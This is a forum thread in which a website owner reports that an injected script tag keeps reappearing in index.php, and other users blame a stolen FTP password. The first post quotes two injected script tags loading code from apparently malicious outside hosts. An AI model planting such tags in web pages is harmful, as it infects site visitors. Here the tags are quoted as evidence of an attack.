index.php getting hacked - adding code

Discussions of secure PHP coding. Security in software is important, so don't be afraid to ask. And when answering: be anal. Nitpick. No security vulnerability is too small.

Moderator: General Moderators

Post Reply
oodya
Forum Newbie
Posts: 5
Joined: Sun Jun 14, 2009 7:45 am

index.php getting hacked - adding code

Post by oodya »

Hi all,

I would really appreciate a bit of help with this. A few days ago, I started messing about with adding a shopping cart to my website. Since then I noticed that the following got added to my index.php file:

</head><script src=http://zegarki.ehost.pl/artdance/podklad.php ></script>

The above coding is not something that I have put in myself.

Since this coding has added itself to my site, I have decided to delete everything on my website and replace all the files with a backup that I had taken (which does not have the above coding in it).

I have then seen the code re-appear again in my index.php file. I can remove this section of the code manually, but I know it will keep on coming back.

Now the following code is appearing:

The following coding has been added to my site now:

</head><script src=http://christinateatern.se/images/karta ... -small.php ></script>

Can someone please help me with this. If any further info is needed from myself, please let me know.

Thanks.
User avatar
flying_circus
Forum Regular
Posts: 732
Joined: Wed Mar 05, 2008 10:23 pm
Location: Sunriver, OR

Re: index.php getting hacked - adding code

Post by flying_circus »

I had a very similar problem. Something was appending a script to the end of any index.* file on my server, in root and sub-directories. I changed my FTP password and it has since sub-sided. I'm not sure how my password got compromised, but apparently it did. It was maddening trying to solve the issue, plus my web host began renaming my index files and changing permissions, so they could not be accessed. :banghead:
oodya
Forum Newbie
Posts: 5
Joined: Sun Jun 14, 2009 7:45 am

Re: index.php getting hacked - adding code

Post by oodya »

Hi,

Thanks for your reply. I have reset my password and will monitor this.

Thanks for your help.
AlexC
Forum Commoner
Posts: 83
Joined: Mon May 22, 2006 10:03 am

Re: index.php getting hacked - adding code

Post by AlexC »

That's what you get for using such a crap protocol =) Use something other than FTP, for example SFTP (no not FTPS) and you'll be far better off.
Post Reply